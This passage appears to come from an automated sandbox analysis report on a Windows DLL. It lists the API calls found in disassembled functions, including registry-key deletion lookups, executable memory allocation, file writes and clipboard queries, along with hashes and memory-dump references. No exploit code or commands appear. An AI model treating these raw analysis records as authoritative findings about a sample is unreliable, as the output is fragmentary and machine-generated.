                                                                                                                                                                                                                      • Part of subcall function 6F211260: SelectObject.GDI32(00000000,00000000), ref: 6F2112F6
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SelectObject.GDI32(00000000,?), ref: 6F211308
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F211321
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F21132F
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SetBkMode.GDI32(?,00000001), ref: 6F211338
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SetTextColor.GDI32(?,00FFFFFF), ref: 6F211344
                                                                                                                                                                                                                      • Part of subcall function 6F211260: GetClientRect.USER32 ref: 6F211356
                                                                                                                                                                                                                      • Part of subcall function 6F211260: ClientToScreen.USER32(?,?), ref: 6F211364
                                                                                                                                                                                                                      • Part of subcall function 6F211260: ClientToScreen.USER32(?,?), ref: 6F211379
                                                                                                                                                                                                                      • Part of subcall function 6F211260: ClientToScreen.USER32(?,?), ref: 6F21139B
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 6F210450
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
                                                                                                                                                                                                                    • String ID: Arial
                                                                                                                                                                                                                    • API String ID: 1525433823-493054409
                                                                                                                                                                                                                    • Opcode ID: 7897d1521ce5fc1df7c15f88c6925f8d4c89bb7907ddb28dbed32b8a1750bd78
                                                                                                                                                                                                                    • Instruction ID: 2b1cebc96198068b6a7388feab9fc380a9e50c46d8d49c4806803c469420d5cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7897d1521ce5fc1df7c15f88c6925f8d4c89bb7907ddb28dbed32b8a1750bd78
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26318F7224460AABEB10DF68DC89B9A77A9FF56322F104012F605DA5D0CBB1F871DF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284DC
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284E8
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284F3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284FE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228509
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228514
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22851F
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22852A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228535
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228543
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                    • Opcode ID: 766785e798af74863ee0afc0f1c7fcda1797e50efa6c154468efa79327c6fb12
                                                                                                                                                                                                                    • Instruction ID: 72b7b3ee39dbe4b5cd6249ceee74e223d312c7a26f2f44db5ef8bfb61bab98b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 766785e798af74863ee0afc0f1c7fcda1797e50efa6c154468efa79327c6fb12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6321537690820CEFCB41DF94C880DDE7BB9FF08754F0185A6B5599B661EB31EA548F80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,819F5D14,?,?,?,6F237D10,000000FF), ref: 6F20D3B9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6F20D3C9
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,819F5D14,?,?,?,6F237D10,000000FF), ref: 6F20D429
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6F20D439
                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 6F20D488
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProc$Delete
                                                                                                                                                                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                                                                                                                                                    • API String ID: 2668475584-1053001802
                                                                                                                                                                                                                    • Opcode ID: cbe46789d803735e66441b9cfd7be054bd6dc804935a275ed6e426150ecbfd5d
                                                                                                                                                                                                                    • Instruction ID: 9b73eb5c7c3dd355a8f26af12efdc441de65d92e6d4a744c3c8bb2ee7f57692c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbe46789d803735e66441b9cfd7be054bd6dc804935a275ed6e426150ecbfd5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331D777608648EFDB119F58D804F95BBA6FB46B21F40412BEC1493A40DFB6B464CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,6F217398,6F24CB78,?,00000000,?,6F211FFA,?,?,00000000,?,?,C000008C), ref: 6F217064
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6F217398,6F24CB78,?,00000000,?,6F211FFA,?,?,00000000), ref: 6F217079
                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,C000008C), ref: 6F2170F5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                                                                    • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                                                                    • API String ID: 1423960858-1745123996
                                                                                                                                                                                                                    • Opcode ID: 8252a5bbe00e89ea5e5e91c647f141d46d8c6702f315dfb3a870143bf0ec14aa
                                                                                                                                                                                                                    • Instruction ID: 70e151c87475df63afc598a08451f830a73fcccedb79d8f0f830c9f7f4cc1d74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8252a5bbe00e89ea5e5e91c647f141d46d8c6702f315dfb3a870143bf0ec14aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D201D2B2809B2D6BCF12DA28CC19FC93BA55B53749F000064FD15B7991DFAAD11CCE99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,6F207C75,6F207C77,00000000,00000000,819F5D14,?,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F2175E9
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,6F207C75,?,00000000,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F217664
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6F21766F
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F217698
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F2176A2
                                                                                                                                                                                                                    • GetLastError.KERNEL32(80070057,819F5D14,?,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F2176A7
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F2176BA
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F2176D0
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F2176E3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1353541977-0
                                                                                                                                                                                                                    • Opcode ID: e094e696e2a90ea59a62d559c571e2189a1e510ebe1187d4e4636efd1c35f96a
                                                                                                                                                                                                                    • Instruction ID: adbafdfbb91bb59fa3c901d3c3c301af0e2c2c743ed5a438f62450df9ecbe81c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e094e696e2a90ea59a62d559c571e2189a1e510ebe1187d4e4636efd1c35f96a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A74119B1A0874DABDB10CF68D844B9EBBF9EF85715F10422AE615D7680DB35E410CFA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F205BD2
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C10
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C82
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: InitNetworkAddressControl.SHELL32 ref: 6F205D50
                                                                                                                                                                                                                    • GetOEMCP.KERNEL32(?,?,00000001,xt), ref: 6F205D77
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,00000001,xt), ref: 6F205D85
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateMenu$AddressClipboardControlCurrentInitNetworkOpenThreadWindow
                                                                                                                                                                                                                    • String ID: xt
                                                                                                                                                                                                                    • API String ID: 3659090326-2466895102
                                                                                                                                                                                                                    • Opcode ID: 17435e65236e7864d6b22b39ca3bcceb7dbac30f921b0c50aaf5f356fa354b85
                                                                                                                                                                                                                    • Instruction ID: 3e17c9644c87e7e6cfec911e5a5610885e4c5691b54585a37119021e8f5d3760
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17435e65236e7864d6b22b39ca3bcceb7dbac30f921b0c50aaf5f356fa354b85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1251B4B3C20F5D8ADB13DF7884661AFB77AAFAB2D5B104317E405BA415EB2094D28E50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F217308,00000000), ref: 6F217182
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 6F217189
                                                                                                                                                                                                                      • Part of subcall function 6F217254: IsProcessorFeaturePresent.KERNEL32(0000000C,6F217170,00000000,?,6F217308,00000000), ref: 6F217256
                                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6F217308,00000000), ref: 6F217199
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6F2171C0
                                                                                                                                                                                                                    • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6F2171D4
                                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(00000000), ref: 6F2171E7
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F2171FA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2460949444-0
                                                                                                                                                                                                                    • Opcode ID: fcff927fae38ac0b6163695a832b6e9d1832a0e97f3b30c448c49aeed2b5bec2
                                                                                                                                                                                                                    • Instruction ID: 995221ee1426f568f31d79987b93efd67b7f4cb8bbed4420b1901f96d852a7d1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcff927fae38ac0b6163695a832b6e9d1832a0e97f3b30c448c49aeed2b5bec2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11027274891567E7215668CC4CF5633EDDB87B51F110410FB40F6644DA50DC25CF79
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A45F
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A478
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A4AA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A4B3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A4BF
                                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 6F22A51C
                                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,?,00000004), ref: 6F22A586
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorLast$FileInfoStartupType
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3484604699-0
                                                                                                                                                                                                                    • Opcode ID: 3ee58aa283807b257f174e7f04078bb8305065c1c84b8955b003b4557e4e4264
                                                                                                                                                                                                                    • Instruction ID: 5237c036a91079b64a966fca6a9ab9969da154df19d58274c434d832c6eeac9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ee58aa283807b257f174e7f04078bb8305065c1c84b8955b003b4557e4e4264
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D16D71A0521A9FDB24CF28C884B9DB7F5FF49314F1046AAE849A7790D731AE90CF80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24D2E0,819F5D14), ref: 6F20FE3D
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6F20FEC0
                                                                                                                                                                                                                    • LoadTypeLib.OLEAUT32(?,00000000), ref: 6F20FEE7
                                                                                                                                                                                                                    • LoadRegTypeLib.OLEAUT32(6F245488,00000000,00000000,?,00000000), ref: 6F20FF02
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24D2FC), ref: 6F2100C5
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24D2FC), ref: 6F2100DB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1976781235-0
                                                                                                                                                                                                                    • Opcode ID: b9e80ec88132bc9b5fd0c0942ace2a24cb23966dc05d19d945964f2f0ba1cca8
                                                                                                                                                                                                                    • Instruction ID: af8e9efb0457e69d07d5618ce2cf2d974c3db600b2dfc00d3008afef73f7c5fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9e80ec88132bc9b5fd0c0942ace2a24cb23966dc05d19d945964f2f0ba1cca8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEB18A75905259DFDB20DF64C88CB9ABBF5FF4A315F104099E808AB240DB75EA54CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000001,00000020,?,?,?,?,?,?,?,6F22E48E,00000008,00000001,00000020,0000002C,?), ref: 6F22DD44
                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6F22DDC3
                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6F22DDE2
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 6F22DE0F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6F22E48E), ref: 6F22DE2F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6F22E48E), ref: 6F22DE69
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                    • Opcode ID: 53e0e747965efe3296b1e1f6c7b302d91612f7e4bd4a4206e2e345484d3c9852
                                                                                                                                                                                                                    • Instruction ID: eead99a77fd101400c5377e2d9aa402d05b86f3f235f93dbd4f7ac738682606e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53e0e747965efe3296b1e1f6c7b302d91612f7e4bd4a4206e2e345484d3c9852
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A95193B1E00649AFDB10CFA8C885AEEBBF9FF0A310F14415AE555E7251D730A955CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6F218187
                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6F21818F
                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6F218218
                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6F218243
                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6F218298
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                    • Opcode ID: a4bd9f277903587f34b1e512a562081394f82f1a00cf056e688ab1548d60ca93
                                                                                                                                                                                                                    • Instruction ID: 2e0334bcdc517f4d880eca3f2ec30dba151ec1fb78998d1a3eac59c979a9588d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4bd9f277903587f34b1e512a562081394f82f1a00cf056e688ab1548d60ca93
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6141BF35E0864D9BCF01CF68C8C4ADE7BF5AF05329F108156EA299B391C735AA15CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,6F20AB4D,6F20AB4C,00000000,00000000,00000000,00000000,819F5D14,00000000,?,00000000,6F20AB4D,?,?), ref: 6F2174B3
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,6F20AB4D,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6F2174EA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                                    • Opcode ID: 3ac966866b12ac57ee6679ca54386b33910ee623b434f8b197f3e36e205e72d9
                                                                                                                                                                                                                    • Instruction ID: f2b5f75233d2a5329347e72ff18b7accaf7186a113ee347801c27beb404b9906
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ac966866b12ac57ee6679ca54386b33910ee623b434f8b197f3e36e205e72d9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F310AB2A08349ABD710CB65DC05BAB77F8EB85B25F104169FE05EA6C0D771A510CEA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6F2122F0
                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 6F212304
                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6F21231A
                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 6F212333
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 6F212342
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long$CallProc
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 513923721-3993045852
                                                                                                                                                                                                                    • Opcode ID: 2670f0bac4c8b857af1928316a3b0a4dd4f9a47f73ce1540746033e36f97c6d4
